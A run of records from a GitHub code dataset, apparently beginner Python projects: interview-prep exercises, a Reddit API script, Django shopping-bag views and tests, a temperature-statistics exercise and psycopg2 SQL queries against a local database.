list(var_tuple_1)\nvar_tuple_2_list = list(var_tuple_2)\nvar_tuple_3_list = list(var_tuple_3)\nprint(id(var_tuple_1_list), id(var_tuple_2_list), id(var_tuple_3_list),\n sep='\\n', end='\\n\\n')\n\nvariable_list_1_tuple = tuple([1, 2, 3, 4, 5])\nvariable_list_2_tuple = tuple([1, 2, 3, 4, 5])\nprint(variable_list_1_tuple, variable_list_2_tuple)\nprint(id(variable_list_1_tuple), id(variable_list_2_tuple), sep='\\n')\nmy_set1, my_set2 = {1, 2, 3, 4}, {1, 2, 3, 4}\nfroz_my_set1 = frozenset(my_set1)\nfroz_my_set2 = frozenset(my_set2)\nprint(froz_my_set1, froz_my_set2)\nprint(id(froz_my_set1), id(froz_my_set2), end='\\n\\n')\n\nmy_list_1 = ['1']\nmy_list_2 = ['1']\nprint(type(my_list_1), id(my_list_1))\nprint(type(my_list_2), id(my_list_2))\nmy_str_1 = str(my_list_1)\nmy_str_2 = str(my_list_1)\nprint(my_str_1, type(my_str_1), id(my_str_1), sep='--')\nprint(my_str_2, type(my_str_2), id(my_str_2), sep='--')\n\nmy_bool_1 = bool(my_list_1)\nmy_bool_2 = bool(my_list_2)\nprint(my_bool_1, type(my_bool_1), id(my_bool_1), sep='--')\nprint(my_bool_2, type(my_bool_2), id(my_bool_2), sep='--')\n","repo_name":"Kosalexx/Project_1","sub_path":"lesson_4/exercises_1-3.py","file_name":"exercises_1-3.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29484937648","text":"# -*- coding: UTF-8 -*-\n\n# 11、简述面向对象中__new__和__init__区别,\n'''\n__init__ : 初始化方法, 创建对象后就默认被调用了, 可以传参数\n1、__new__至少要有一个参数cls,代表当前类,此参数在实例化时由Python解释器自动识别\n\n2、__new__必须要有返回值,返回实例化出来的实例,这点在自己实现__new__时要特别注意,\n可以return父类(通过super(当前类名, cls))__new__出来的实例,或者直接是object的__new__出来的实例\n\n3、__init__有一个参数self,就是这个__new__返回的实例,__init__在__new__的基础上可以完成一些其它初始化的动作,__init__不需要返回值\n\n4、如果__new__创建的是当前类的实例,会自动调用__init__函数,通过return语句里面调用的__new__函数的第一个参数是cls来保证是当前类实例,\n如果是其他类的类名,;那么实际创建返回的就是其他类的实例,其实就不会调用当前类的__init__函数,也不会调用其他类的__init__函数。\n\n'''\nimport random\n\n# import numpy as np\nimport re\n\n\nclass Foo(object):\n def __init__(self, color, money):\n self.color = color\n self.money = money\n\n def move(self):\n print('running.........')\n\n\nferrari = Foo('red', '200w')\nlawse = Foo('black', '300w')\nprint('法拉利的颜色为:{},价格{}:'.format(ferrari.color, ferrari.money))\nprint('劳斯的颜色为:{},价格{}:'.format(lawse.color, lawse.money))\n\n\nclass Obj(object):\n def __init__(self, name, age):\n print('3__init__:', self) # 3__init__: <__main__.Obj object at 0x7f2e2e100240>\n self.name = name\n self.age = age\n\n def __new__(cls, *args, **kwargs):\n print('1_cls:', id(cls)) # 1_cls: 14915272\n if not hasattr(cls, '_inst'):\n cls._inst = super(Obj, cls).__new__(cls)\n print('2__new__:', cls._inst) # 2__new__: <__main__.Obj object at 0x7f2e2e100240>\n return cls._inst\n\n\na = Obj('zhangsan', 19)\n# b = Obj('lisi', 20)\nprint(a.name, a.age)\n# print(b.name, b.age)\nprint('4_Obj:', id(Obj)) # 4_Obj: 14915272\nprint('*'*60)\n\n\n# 12、简述with方法打开处理文件帮我我们做了什么?\n\"\"\"\n打开文件在进行读写的时候可能会出现一些异常状况,如果按照常规的f.open\n\n写法,我们需要try,except,finally,做异常判断,并且文件最终不管遇到什么情况,\n都要执行finally f.close()关闭文件,with方法帮我们实现了finally中f.close\n\"\"\"\nf = open('./note.txt', 'wb')\ntry:\n f.write('hello world')\nexcept:\n pass\nfinally:\n f.close()\n\n# with open('./note2.txt', 'wb') as f2:\n# f2.write('made in China')\n\n\n# 13、列表[1,2,3,4,5],请使用map()函数输出[1,4,9,16,25],并使用列表推导式提取出大于10的数,最终输出[16,25]\n# map()函数第一个参数是fun,第二个参数是一般是list,第三个参数可以写list,也可以不写,根据需求\nli1 = [1, 2, 3, 4, 5]\n\n\ndef foo(x):\n return x ** 2\n\n\nli2 = list(map(foo, li1))\nprint(li2) # [1, 4, 9, 16, 25]\nprint([x for x in li2 if x > 10]) # [16, 25]\nprint('='*60)\n\n\n# 14、python中生成随机整数、随机小数、0--1之间小数方法\nprint(random.randint(1, 3))\n# print(np.random.randn(5))\nprint(random.random()) # 0.23450313090215458\nprint('&'*60)\n\n\n# 15、避免转义给字符串加哪个字母表示原始字符串?\n# r , 表示需要原始字符串,不转义特殊字符\n\n\n# 16、re\nstr1 = '
    中国
    '\nres = re.findall(r'
    (.*?)
    ', str1) # .* 类名可有可元, () 提取\nprint(res)\nprint(\"%\"*60)\n\n\n# 17、python 断言方法\nn = 3\nassert(n > 1)\nprint('success') # 打印\n# assert(n < 2)\n# print('failure') # 不打印\n\n\n# 18、数据表student有id,name,score,city字段,其中name中的名字可有重复,需要消除重复行,请写sql语句\n# select distinct name from *;\n\n\n# 19、10个Linux常用命令\n# ls pwd cp mv tar zip unzip lsof grep top tree cat tail herf du cal ssh\n# touch mkdir sudo install version pip list cd more echo rm\n\n\n# 20、python2和python3区别?列举5个,\n# name = raw_input('')\n# print(name)\n# age = input('')\n# print(age)\n'''\n1、Python3 使用 print 必须要以小括号包裹打印内容,比如 print('hi')\n\nPython2 既可以使用带小括号的方式,也可以使用一个空格来分隔打印内容,比如 print 'hi'\n\n2、python2 range(1,10)返回列表,python3中返回迭代器,节约内存\n\n3、python2中使用ascii编码,python中使用utf-8编码\n\n4、python2中unicode表示字符串序列,str表示字节序列\n\n python3中str表示字符串序列,byte表示字节序列\n\n5、python2中为正常显示中文,引入coding声明,python3中不需要\n\n6、python2中是raw_input()函数,python3中是input()函数\n\n'''","repo_name":"13528770807/practice","sub_path":"qiang14_working2/q02_new_init.py","file_name":"q02_new_init.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29106150520","text":"def solve(nums, target): \n dictionary = {}\n for i in range(len(nums)):\n dictionary[nums[i]] = i \n print(dictionary) \n for i in range(len(nums)):\n a = nums[i]\n b = target - a \n print(\"gf\",a,b)\n if b in dictionary:\n print(a,b)\n if (i-1) != dictionary[b]-1:\n return [i, dictionary[b]] \n\nnums = [3,2,4]\ntarget = 6\nprint(solve(nums, target))","repo_name":"chithra-m/ds_code_snippets","sub_path":"leetcode/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34096235023","text":"import sys\nfrom PyQt5.QtWidgets import QWidget,QApplication\nfrom ui_Widget import Ui_Widget\n\nclass QmyWidget(QWidget):\n def __init__(self,parrent=None):\n super().__init__(parrent)\n self.ui = Ui_Widget()\n self.ui.setupUi(self)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myWidget = QmyWidget()\n myWidget.show()\n sys.exit(app.exec_())\n","repo_name":"emwzq/pyqt5_learning","sub_path":"Introduction/qt_res/appMain.py","file_name":"appMain.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72338444266","text":"#!/usr/bin/python3\n\"\"\"Queries the Reddit API and prints the titles of the first 10 hot posts.\"\"\"\nfrom requests import get\n\n\ndef top_ten(subreddit):\n \"\"\"If not a valid subreddit, print None.\"\"\"\n url = 'https://www.reddit.com/r/{}/hot.json?limit=10'.format(subreddit)\n Agents = {'User-agent': 'Agent-Subscribe'}\n Response = get(url, headers=Agents, allow_redirects=False)\n if (Response.status_code != 200):\n print('None')\n else:\n ChildTitles = Response.json()['data']['children']\n for HotPosts in ChildTitles:\n print(HotPosts['data']['title'])\n","repo_name":"747-diego/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26917832897","text":"from django.shortcuts import render, HttpResponse, redirect, get_object_or_404, reverse\nfrom products.models import Product, Variants\nfrom django.contrib import messages\n\n\n# Create your views here.\ndef view_bag(request):\n\n return render(request, 'shopping_bag/shopping_bag.html')\n\n\ndef add_to_bag(request, item_id):\n\n quantity = int(request.POST.get('quantity'))\n redirect_url = request.POST.get('redirect_url')\n bag = request.session.get('bag', {})\n\n if item_id == None:\n HttpResponse('variant is none')\n variant = get_object_or_404(Variants, pk=item_id) \n\n if item_id in list(bag.keys()):\n bag[item_id] += quantity\n messages.success(request, f'{bag[item_id]} {variant.size} {variant.color} {variant.title}s are added to your bag.')\n else:\n bag[item_id] = quantity\n messages.success(request, f'Added {variant.size} {variant.color} {variant.title} to your bag.')\n\n request.session['bag'] = bag\n\n return redirect(redirect_url)\n\n\ndef adjust_bag(request, item_id):\n\n variant = get_object_or_404(Variants, pk=item_id)\n quantity = int(request.POST.get('quantity'))\n bag = request.session.get('bag', {})\n\n if quantity > 0:\n bag[item_id] = quantity\n messages.success(request, f'{quantity} {variant.title} in your bag is ')\n else:\n bag.pop(item_id)\n messages.success(request, f'{variant.title} successfully removed from your bag.')\n\n request.session['bag'] = bag\n\n return redirect(reverse('view_bag'))\n\n\ndef remove_from_bag(request, item_id):\n try:\n variant = get_object_or_404(Variants, pk=item_id)\n bag = request.session.get('bag', {})\n bag.pop(item_id)\n messages.success(request, f'{variant.title} removed from bag.')\n request.session['bag'] = bag\n return HttpResponse(status=200)\n\n except Exception as e:\n messages.error(request, f'Error removing item: {e}')\n return redirect(reverse('view_bag'))\n","repo_name":"ashur-k/RR-Clothes","sub_path":"shopping_bag/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526101167","text":"\"\"\"\nGiven intervals for when meetings are taking place, find the earliest time \na new meeting of duration d can take place.\n\nmeetings = [[10, 50], [35, 70], [150, 170], [250, 300]]\n\nIf d = 80\nexpected: 70\nbecause the meeting of duration 80 can fit between 70 and 150.\n\nIf d = 10\nexpected: 0\nbecause the meeting of duration 10 can be placed as the first meeting. \n\nIf d = 500\nexpected: 300\nbecause the meeting of duration 500 can only go after the last meeting.\n\n\nmeetings = [[0,30], [10,20], [20,40],[60,80]]\n\n\"\"\"\n\ndef findEarliestTime(meetings, d):\n earliestTimeSoFar = 0\n\n i = 0\n n = meetings[i]\n if d <= n[0]:\n return earliestTimeSoFar\n\n while i < len(meetings)-1:\n currMeeting = meetings[i] \n nextMeeting = meetings[i+1]\n \n if currMeeting[1] + d <= nextMeeting[0]:\n earliestTimeSoFar = currMeeting[1]\n # print(\"earliestTimeSoFar updated: \", earliestTimeSoFar)\n\n i += 1\n\n if earliestTimeSoFar == 0:\n return meetings[-1][1]\n\n return earliestTimeSoFar\n\ndef test2():\n meetings = [[0,30], [10,20], [20,40],[60,80]]\n #d = 20 # expected res: 40\n #d = 10 # expected res: 40\n #d = 0 # expected res: 0 \n #d = 100 # expected res: 80\n #d = 30 # expected res: 80\n res = findEarliestTime(meetings, d)\n print(\"res: \", res)\n\ntest2()\n\ndef test():\n meetings = [[10, 30], [35, 70], [150, 170], [250, 300]]\n d = 10\n res = findEarliestTime(meetings, d)\n print(\"res:\" , res)\n\n#test()\n\n","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/earliest_time_in_schedule.py","file_name":"earliest_time_in_schedule.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"73473978028","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\nfrom django. core. cache import cache\n\nfrom posts.models import Group, Post, Follow\nfrom ..forms import PostForm\nfrom datetime import date\n\nUser = get_user_model()\n\n\nclass PostTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.user_creator = User.objects.create(username='user_cr')\n cls.user_uncreator = User.objects.create(username='user_un')\n cls.group = Group.objects.create(\n title='Заголовок для тестовой группы',\n slug='test_slug',\n description='Текст описания тестовой группы'\n )\n cls.post = Post.objects.create(\n text='Тестовая запись для создания нового поста',\n author=cls.user_creator,\n group=cls.group,\n pub_date=date.today()\n )\n cls.form_field = {\n 'text': forms.fields.CharField,\n 'group': forms.fields.ChoiceField\n }\n cls.posts = cls.post.author.posts.select_related('author')\n cls.cnt_posts = cls.post.author.posts.count()\n\n def setUp(self):\n self.guest_client = Client()\n self.user = User.objects.create_user(username='guest')\n self.post_creator = Client()\n self.post_creator.force_login(self.user_creator)\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user_uncreator)\n\n def check_context_contains_page_or_post(self, context, post=False):\n if post:\n self.assertIn('post', context)\n post = context['post']\n else:\n self.assertIn('page', context)\n post = context['page'][0]\n self.assertEqual(post.author, PostTests.user_creator)\n self.assertEqual(post.pub_date, PostTests.post.pub_date)\n self.assertEqual(post.text, PostTests.post.text)\n self.assertEqual(post.group, PostTests.post.group)\n\n # def checking_correct_group(self, group):\n # self.assertEqual(self.group.title, group.title)\n # self.assertEqual(self.group.slug, group.slug)\n # self.assertEqual(self.group.description, group.description)\n\n def test_pages_uses_correct_template(self):\n \"\"\"URL-адрес использует соответствующий шаблон.\"\"\"\n templates_pages_names = {\n reverse(\n 'posts:index'\n ): 'posts/index.html',\n reverse(\n 'posts:posts', kwargs={'slug': self.group.slug}\n ): 'posts/group_list.html',\n reverse(\n 'posts:profile', kwargs={'username': self.post.author}\n ): 'posts/profile.html',\n reverse(\n 'posts:post_detail', kwargs={'post_id': self.post.pk}\n ): 'posts/post_detail.html',\n reverse(\n 'posts:post_create'\n ): 'posts/post_create.html',\n reverse(\n 'posts:post_edit', kwargs={'post_id': self.post.pk}\n ): 'posts/post_create.html',\n }\n\n for reverse_name, template in templates_pages_names.items():\n with self.subTest(reverse_name=reverse_name):\n response = self.post_creator.get(reverse_name)\n self.assertTemplateUsed(response, template)\n if reverse_name == reverse(\n 'posts:post_edit', kwargs={'post_id': self.post.pk}\n ):\n self.assertRedirects(\n self.guest_client.get(reverse_name),\n '/auth/login/?next=%2Fposts%2F1%2Fedit%2F'\n )\n elif reverse_name == reverse(\n 'posts:post_create',\n ):\n self.assertRedirects(\n self.guest_client.get(reverse_name),\n '/auth/login/?next=%2Fcreate%2F'\n )\n else:\n self.assertTemplateUsed(\n self.guest_client.get(reverse_name),\n template\n )\n\n def test_index_show_correct_context(self):\n \"Список всех постов\"\n response = self.authorized_client.get(reverse('posts:index'))\n self.check_context_contains_page_or_post(response.context)\n\n def test_grouplist_show_correct_context(self):\n \"\"\"Список постов отфильтрованный по группе\"\"\"\n response = self.authorized_client.get(reverse(\n 'posts:posts', kwargs={'slug': self.group.slug}\n ))\n self.check_context_contains_page_or_post(response.context.get('group'))\n self.check_context_contains_page_or_post(\n response.context['page_obj'][0], post=True\n )\n\n def test_profile_show_correct_context(self):\n \"Список постов отфильтрованный по пользователю\"\n response = self.authorized_client.get(reverse(\n 'posts:profile', kwargs={'username': self.post.author}\n ))\n self.check_context_contains_page_or_post(response.context)\n\n self.assertIn('author', response.context)\n self.assertEqual(response.context['author'], PostTests.user)\n\n def test_postdetail_show_correct_context(self):\n \"\"\"Один пост, отфильтрованный по id\"\"\"\n response = self.authorized_client.get(reverse(\n 'posts:post_detail', kwargs={'post_id': self.post.pk}\n ))\n self.check_context_contains_page_or_post(response.context, post=True)\n\n self.assertIn('author', response.context)\n self.assertEqual(response.context['author'], PostTests.user_creator)\n\n self.assertIn('posts_count', response.context)\n self.assertEqual(\n response.context['posts_count'], PostTests.user.posts.count()\n )\n\n def test_add_or_editpost_show_correct_context(self):\n \"\"\"Форма редактирования поста, отфильтрованного по id\"\"\"\n # Сначала проверка редактирования поста\n response = self.post_creator.get(reverse(\n 'posts:post_edit',\n kwargs={'post_id': self.post.pk}\n ))\n\n self.assertIn('form', response.context)\n self.assertIsInstance(response.context['form'], PostForm)\n self.assertIn('is_edit', response.context)\n is_edit = response.context['is_edit']\n self.assertIsInstance(is_edit, bool)\n self.assertEqual(is_edit, True)\n\n # Теперь доп.проверка создания поста\n response = self.authorized_client.get(reverse('posts:post_create'))\n is_edit = response.context['is_edit']\n self.assertEqual(is_edit, False)\n\n for value, expected in self.form_field.items():\n with self.subTest(value=value):\n form_field = response.context['form'].fields[value]\n self.assertIsInstance(form_field, expected)\n\n\nclass PaginatorViewsTest(TestCase):\n @classmethod\n def setUpClass(cls):\n cls.user_auth = User.objects.create(username='auth')\n super().setUpClass()\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test_slug',\n description='Текст описания тестовой группы'\n )\n cls.some_posts = [\n Post(\n author=cls.user_auth,\n text=f'Тестовый пост{i}',\n group=cls.group\n )\n for i in range(15)\n ]\n Post.objects.bulk_create(cls.some_posts)\n cls.pages: tuple = (\n reverse('posts:index'),\n reverse('posts:profile',\n kwargs={'username': f'{cls.user_auth.username}'}),\n reverse('posts:posts',\n kwargs={'slug': f'{cls.group.slug}'}))\n\n def setUp(self):\n self.not_authorized = Client()\n self.unauthorized = Client()\n self.authorized = Client()\n self.authorized.force_login(self.user_auth)\n cache.clear()\n\n def test_correct_page_context_guest_client(self):\n \"\"\"Проверка количества постов на страницах для гостя. \"\"\"\n cache.clear()\n for page in self.pages:\n response_1page = self.not_authorized.get(page)\n response_2page = self.not_authorized.get(page + '?page=2')\n self.assertEqual(\n len(response_1page.context.get('page_obj')), 10\n )\n self.assertEqual(\n len(response_2page.context.get('page_obj')), 5\n )\n cache.clear()\n\n pagination = {\n 1: 10,\n 2: 5\n }\n\n for page_number, count in pagination.items():\n response = self.unauthorized.get(\n reverse('posts:index'), {'page': page_number}\n )\n self.assertEqual(\n len(response.context.get('page_obj')), count\n )\n\n def test_correct_page_context_auth_client(self):\n \"\"\"Проверка количества постов на страницах для авторизованного.\"\"\"\n cache.clear()\n for page in self.pages:\n response_1page = self.authorized.get(page)\n response_2page = self.authorized.get(page + \"?page=2\")\n self.assertEqual(\n len(response_1page.context.get('page_obj')), 10\n )\n self.assertEqual(\n len(response_2page.context.get('page_obj')), 5\n )\n cache.clear()\n\n\nclass CacheViewsTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.author = User.objects.create_user(username='test_user')\n cls.authorized_client = Client()\n cls.authorized_client.force_login(cls.author)\n cls.group = Group.objects.create(\n title='test_group',\n slug='test-slug',\n description='test_description'\n )\n cls.post = Post.objects.create(\n text='test_post',\n group=cls.group,\n author=cls.author\n )\n\n def test_cache_index(self):\n \"\"\"Проверка хранения и очищения кэша для index.\"\"\"\n response = CacheViewsTest.authorized_client.get(reverse('posts:index'))\n posts = response.content\n Post.objects.create(\n text='test_new_post',\n author=CacheViewsTest.author,\n )\n response_old = CacheViewsTest.authorized_client.get(\n reverse('index')\n )\n old_posts = response_old.content\n self.assertEqual(\n old_posts,\n posts,\n 'Не возвращает кэшированную страницу.'\n )\n cache.clear()\n response_new = CacheViewsTest.authorized_client.get(reverse('posts:index'))\n new_posts = response_new.content\n self.assertNotEqual(old_posts, new_posts, 'Нет сброса кэша.')\n\n\nclass FollowViewsTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.guest_client = Client()\n cls.author = User.objects.create_user(\n username='test_author'\n )\n cls.auth_author_client = Client()\n cls.auth_author_client.force_login(cls.author)\n\n cls.user_fol = User.objects.create_user(\n username='test_user_fol'\n )\n cls.authorized_user_fol_client = Client()\n cls.authorized_user_fol_client.force_login(\n cls.user_fol\n )\n\n cls.user_unfol = User.objects.create_user(\n username='test_user_unfol'\n )\n cls.authorized_user_unfol_client = Client()\n cls.authorized_user_unfol_client.force_login(\n cls.user_unfol\n )\n cls.group = Group.objects.create(\n title='test_group',\n slug='test-slug',\n description='test_description'\n )\n cls.post = Post.objects.create(\n text='test_post',\n group=cls.group,\n author=cls.author\n )\n\n def test_follow(self):\n \"\"\"Тест работы подписки на автора.\"\"\"\n client = FollowViewsTest.authorized_user_unfol_client\n user = FollowViewsTest.user_unfol\n author = FollowViewsTest.author\n client.get(\n reverse(\n 'posts:profile_follow',\n args=[author.username]\n )\n )\n follower = Follow.objects.filter(\n user=user,\n author=author\n ).exists()\n self.assertTrue(\n follower,\n 'Не работает подписка на автора'\n )\n\n def test_unfollow(self):\n \"\"\"Тест работы отписки от автора.\"\"\"\n client = FollowViewsTest.authorized_user_unfol_client\n user = FollowViewsTest.user_unfol\n author = FollowViewsTest.author\n client.get(\n reverse(\n 'posts:profile_unfollow',\n args=[author.username]\n ),\n\n )\n follower = Follow.objects.filter(\n user=user,\n author=author\n ).exists()\n self.assertFalse(\n follower,\n 'Не работает отписка от автора'\n )\n\n def test_new_author_post_for_follower(self):\n client = FollowViewsTest.authorized_user_fol_client\n author = FollowViewsTest.author\n group = FollowViewsTest.group\n client.get(\n reverse(\n 'posts:profile_follow',\n args=[author.username]\n )\n )\n response_old = client.get(\n reverse('posts:follow_index')\n )\n old_posts = response_old.context.get(\n 'page'\n ).object_list\n self.assertEqual(\n len(response_old.context.get('page').object_list),\n 1,\n 'Не загружается правильное колличество старых постов'\n )\n self.assertIn(\n FollowViewsTest.post,\n old_posts,\n 'Старый пост не верен'\n )\n new_post = Post.objects.create(\n text='test_new_post',\n group=group,\n author=author\n )\n cache.clear()\n response_new = client.get(\n reverse('posts:follow_index')\n )\n new_posts = response_new.context.get(\n 'page'\n ).object_list\n self.assertEqual(\n len(response_new.context.get('page').object_list),\n 2,\n 'Нету нового поста'\n )\n self.assertIn(\n new_post,\n new_posts,\n 'Новый пост не верен'\n )\n\n def test_new_author_post_for_unfollower(self):\n client = FollowViewsTest.authorized_user_unfol_client\n author = FollowViewsTest.author\n group = FollowViewsTest.group\n response_old = client.get(\n reverse('posts:follow_index')\n )\n old_posts = response_old.context.get(\n 'page'\n ).object_list\n self.assertEqual(\n len(response_old.context.get('page').object_list),\n 0,\n 'Не загружается правильное колличество старых постов'\n )\n self.assertNotIn(\n FollowViewsTest.post,\n old_posts,\n 'Старый пост не должен загружаться'\n )\n new_post = Post.objects.create(\n text='test_new_post',\n group=group,\n author=author\n )\n cache.clear()\n response_new = client.get(\n reverse('posts:follow_index')\n )\n new_posts = response_new.context.get(\n 'page'\n ).object_list\n self.assertEqual(\n len(response_new.context.get('page').object_list),\n 0,\n 'Новый пост не должен появляться'\n )\n self.assertNotIn(\n new_post,\n new_posts,\n 'Новый пост не должен появляться'\n )\n","repo_name":"smirnov71/hw04-05-06_errors_and_pictures","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":16629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25823930940","text":"from random import *\r\n\r\nprint('Здравсвтуйте! Добро пожаловать в программу, которая заполняет ',end = \"\")\r\nprint('список данными о средней температуре каждого дня июля ',end = \"\")\r\nprint('случайными числами в диапазоне от +15 до +42.')\r\nprint('В последствии она выводит информацию о средней температуре ',end = \"\")\r\nprint('каждого дня в Июле, а также выводит даты двух самых теплых дней',end = \" \")\r\nprint('вместе с их датами.')\r\n\r\nJULY_DAYS = 31\r\n\r\nMIN_TEMPERATURE = 15\r\nMAX_TEMPERATURE = 42\r\n\r\nINDEX_STEP = 1\r\n\r\njuly_temparatures = []\r\n\r\nfor day_index in range(JULY_DAYS):\r\n\tjuly_temparatures.append(randint(MIN_TEMPERATURE,MAX_TEMPERATURE))\r\n\tprint('Средняя температура за {}-е число составляет {} градусов'.format(day_index + INDEX_STEP,july_temparatures[day_index]))\r\n\r\n#1\r\nwarmest_day_a = 0\r\nwarmest_day_b = 0\r\n\r\nwarmest_day_a_index = 0\r\nwarmest_day_b_index = 0\r\n\r\nfor day_index in range(JULY_DAYS):\r\n\tif(july_temparatures[day_index] > warmest_day_a):\r\n\t\twarmest_day_a = july_temparatures[day_index]\r\n\t\twarmest_day_a_index = day_index\r\n\r\nfor day_index in range(JULY_DAYS):\r\n\tif(july_temparatures[day_index] > warmest_day_b and july_temparatures[day_index] < warmest_day_a):\r\n\t\twarmest_day_b = july_temparatures[day_index]\r\n\t\twarmest_day_b_index = day_index\r\n\r\nprint('\\nГотово! Выдаю результаты: ')\r\nprint()\r\n\r\nprint(\"Самыми жаркими днями являются {} июля с температурой {}\".format(warmest_day_a_index + INDEX_STEP,warmest_day_a), end = \" \")\r\nprint(\"и {} июля с температурой {}\".format(warmest_day_b_index + INDEX_STEP, warmest_day_b))\r\n\r\n#2\r\ndecades_temperature_july = []\r\nsum_temperatures_decade = 0\r\nDECADE_TERMINAL = 10\r\n\r\nfor day_index in range(JULY_DAYS):\r\n\tsum_temperatures_decade += july_temparatures[day_index]\r\n\tif((day_index + INDEX_STEP) % DECADE_TERMINAL == 0 ):\r\n\t\tdecades_temperature_july.append(sum_temperatures_decade)\r\n\t\tsum_temperatures_decade = 0 # Что по поводу Последнего 31-го дня? Куда отнести и что с ним сделать?\r\n\r\ncoldest_decade = decades_temperature_july[0]\r\ncoldest_decade_index = 0\r\n\r\nfor decade_index in range(len(decades_temperature_july)):\r\n\tif(decades_temperature_july[decade_index] < coldest_decade):\r\n\t\tcoldest_decade = decades_temperature_july[decade_index]\r\n\t\tcoldest_decade_index = decade_index\r\nprint('\\nГотово! Самая холодная декада найдена.')\r\nprint()\r\nprint(\"Самой холодной декадой является {} с общей температурой {}\".format(coldest_decade_index + INDEX_STEP,coldest_decade))\r\nprint()\r\n#3\r\nupdated_july_temparatures = []\r\nupdated_july_temparatures.append(randint(MIN_TEMPERATURE,MAX_TEMPERATURE))\r\nDAYS_MAX_DIFFERENCE_TEMPERATURE = 5\r\n\r\nfor day_index in range(1,JULY_DAYS):\r\n\tprevious_day_temperature = updated_july_temparatures[day_index - INDEX_STEP]\r\n\tnew_random_temperature = randint(previous_day_temperature - DAYS_MAX_DIFFERENCE_TEMPERATURE ,previous_day_temperature + DAYS_MAX_DIFFERENCE_TEMPERATURE)\r\n\r\n\twhile(new_random_temperature < MIN_TEMPERATURE or new_random_temperature > MAX_TEMPERATURE):\r\n\t\tnew_random_temperature = randint(previous_day_temperature - DAYS_MAX_DIFFERENCE_TEMPERATURE ,previous_day_temperature + DAYS_MAX_DIFFERENCE_TEMPERATURE)\r\n\t\t\r\n\tupdated_july_temparatures.append(new_random_temperature)\r\n\r\nprint('Среднесуточные температуры Июля где температуры рядом стоящих дней',end = \" \")\r\nprint('не отличается больше чем на 5 градусов: ',end = \"\")\r\n\r\nfor day_temperature in updated_july_temparatures:\r\n\tprint(day_temperature, end = \", \")\r\n\r\n\r\n","repo_name":"MaratulyTemirbolat/ItStep","sub_path":"Python/HomeWorks/HW14/HW_MaratulyTemirbolat.py","file_name":"HW_MaratulyTemirbolat.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70250132267","text":"# todo:Прочитать главу 6 (стр. 119) книги SQL Полное Руководство.\n#Написать на модели данный ПО \"Авторизации\" запросы:\n\n\nimport psycopg2\n\nconn = psycopg2.connect(\n host=\"localhost\",\n database=\"task\",\n user=\"postgres\",\n password=\"4511\")\n\nprint(conn)\n\ncur = conn.cursor()\n\n#1. Простой запрос\n#список студентов, и их задачи\n\nSQL = f\"\"\"SELECT s.surname , t.\"name\"n , t.condition\n FROM students s , students_task st , task t\n WHERE s.id = st.id_students\n AND st.id_task = t.id\"\"\"\n \n\ncur.execute(SQL)\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\nconn(close)\n\n\n#2. Вычисляемый столбец\n#студенты решившие задачу 1\n\n\nSQL_TASK = f\"\"\"SELECT s.surname , t.name \n from students s , students_task st , task t\n where s.id = st.id_students\n and t.id = st.id_task\n\t and t.id = 1\"\"\"\ncur.execute(SQL_TASK)\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n#3. Выборка всех столбцов\n\nSQL_ALL = f\"\"\"SELECT s.surname , t.name , t.condition\n from students s , students_task st , task t\n where s.id = st.id_students\n and t.id = st.id_task\"\"\"\n\ncur.execute(SQL_ALL)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n#4. Повторяющиеся строки (DISTINCT)\n\nSQL_DISTINCT = f\"\"\"SELECT DISTINCT s.surname\n from students s\"\"\"\n\ncur.execute(SQL_DISTINCT)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n#5. Отбор строк (WHERE) с оператором ставнения\n\nSQL_WHERE = f\"\"\"SELECT id_students , id_task\n from students_task\n where id_task <> 1\"\"\"\n\ncur.execute(SQL_WHERE)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n# 6. Выборка одной строки\n\n\nSQL_LINE = f\"\"\"SELECT name\n from task\n where id = 1\"\"\"\n\ncur.execute(SQL_LINE)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n# 7. Проверка на принадлежность диапазону (BETWEEN)\n\nSQL_BETWEEN = f\"\"\"SELECT ID , name , condition\n from task\n where id BETWEEN 2 AND 4\"\"\"\n\n\ncur.execute(SQL_BETWEEN)\n\nrecords = cur.fetchall()\nfor row in records:\n print(row)\n\n\nconn(close)\n\n# 8. Проверка 